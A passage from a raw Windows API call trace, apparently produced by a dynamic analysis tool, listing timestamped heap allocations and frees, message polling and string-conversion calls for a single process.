hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0086.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0086.530] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0086.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0086.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0086.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0086.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0086.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.532] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a71898 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0086.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0086.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ab8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0086.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0086.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.533] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69700 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0086.534] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0086.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ab8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a698b0 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0086.535] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.535] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0086.535] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0086.535] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0086.535] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0086.535] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0086.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69760 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0086.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: 